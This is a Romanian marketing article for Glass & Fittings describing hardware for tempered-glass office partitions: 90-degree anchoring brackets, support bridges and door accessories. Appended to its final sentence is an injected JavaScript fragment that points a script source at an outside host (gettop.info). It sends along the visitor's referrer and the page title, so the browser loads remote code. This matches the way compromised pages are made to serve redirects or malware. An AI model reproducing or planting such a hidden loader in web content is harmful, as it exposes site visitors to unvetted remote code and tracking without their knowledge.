feronerie compartimentari

feronerie compartimentari

Sticla este materialul secolului XXI in domeniul constructiilor si al amenajarilor interioare, insa nu trebuie sa va fie teama, pentru aceste domenii nu este folosita o sticla obisnuita, prin tratarea termica si laminarea fasiilor de sticla obisnuita se obtine un nou tip de sticla, mai exact cea securizata. Insa, pentru a putea compartimenta un spatiu de birouri, de exemplu, nu este suficient sa aveti numarul necesar de panouri din sticla securizata, ci va mai trebuie ceva. Glass & Fittings va ofera o gama completa de feronerie compartimentari necesara pentru fixarea ferma a panourilor din sticla in diferite configuratii si mai ales, pozitii. Pentru aceasta, toate elementele de prindere sunt concepute special pentru a oferi rigiditatea necesara peretilor din sticla securizata, dar in acelasi timp, sa ofere o metoda de fixare a panourilor din sticla care sa nu avarieze suprafata de sticla.

Acest articol va fi dedicat descrierii elementelor de feronerie compartimentari dar si a descrierii generale a categoriilor de elemente de fixare. In primul rand, putem spune ca exista doua tipuri de fixari, cele de prindere sau ancorare si cele de sustinere a panourilor. Bine inteles, pot fi folosite sau create diferite solutii de prindere in functie de necesitatile fiecarui proiect. Insa, noi ne vom referi la elementele de feronerie compartimentari standard.

Ancorarea si sustinerea peretilor din sticla cu elemente de feronerie compartimentari

Ancorarea peretilor de sticla este realizata prin suporti speciali ce diferite unghiuri de prindere, insa cele mai uzuale sunt cele la 90o pentru ancorarea peretilor de sticla fie de tavan sau prinderea lor la sol si de structura verticala a cladirii. Aceste elemente de feronerie compartimentari sunt realizate de cele mai multe ori din otel de inalta calitate, fiind prevazute cu elemente de protectie a partii de prindere a panoului de sticla din cauciuc sau PVC moale. Astfel se elimina riscul de a crapa panoul din sticla la prinderea acestuia in suport.

Solutii complete de feronerie compartimentari

Tot la noi veti putea gasi de asemenea diferite tipuri de feronerie compartimentari pentru sustinerea panourilor de sticla. Acestea sunt folosite pentru a fixa fasiile intre ele si de a mari rigiditatea peretilor din sticla. Acestea sunt sub forma unor punti ce pot fi simple, cu 2 prinderi sau in forma de cruce sau cu mai multe prinderi. In functie de dimensiunile fiecarui panou ce formeaza peretele de compartimentare, elementele de feronerie compartimentari sunt alese astfel incat sa poata oferi gradul de rigiditate si sustinere necesar pentru respectiva structura.

Bine inteles, elementele de feronerie compartimentari nu se rezuma doar la solutii de prindere si sustinere a panourilor, va oferim de asemenea, si accesorii pentru fixarea usilor sau sau a altor elemente de sustinere. Toata linia de produse pe care v-o propunem este realizata din cele mai performante materiale fie ca vorbim despre oteluri de inalta calitate sau aliaje pe baza de Aluminiu. Pe siteul nostru www.glassfittings.ro veti gasi toate elementele necesare pentru a va contura intregul spatiu destinat pentru birouri dar si pentru a realiza diferite tipuri de amenajari interioare pentru casa. Va asteptam cu o oferta completa la cele mai bune preturi.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;